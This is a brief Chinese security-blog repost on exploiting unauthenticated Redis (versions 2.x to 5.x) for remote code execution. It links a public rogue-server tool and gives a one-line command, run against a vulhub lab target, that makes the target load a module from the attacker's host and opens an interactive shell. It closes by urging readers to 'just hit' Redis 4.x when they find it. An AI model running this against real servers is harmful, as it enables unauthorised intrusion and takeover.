Redis未授权访问利用RCE脚本

admin 2024年8月18日21:46:57评论10 views字数 501阅读1分40秒阅读模式

redis-rce

01

Redis-RCE

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis在默认情况下,会绑定6379这个端口,如果服务器没有采用限制IP访问或在防火墙做策略,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下(既然有密码也可进行爆破),会导致用户未授权访问,可能导致,SSH远程登录,写入webshell,交互式shell,反弹shell等操作
影响版本:Redis 2.x,3.x,4.x,5.x

小编这里找到一个改进过后的RCE脚本:

https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server

靶机(vulhub)启动redis后,直接上命令

python3 redis_rogue_server.py  -rhost 192.168.x.x -lhost 192.168.x.x -v输入i,获取shell

Redis未授权访问利用RCE脚本

挺好使的脚本,下回遇到redis 4.x的版本,直接打。

原文始发于微信公众号(道玄网安驿站):Redis未授权访问利用RCE脚本

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月18日21:46:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Redis未授权访问利用RCE脚本http://cn-sec.com/archives/3077976.html

发表评论

匿名网友 填写信息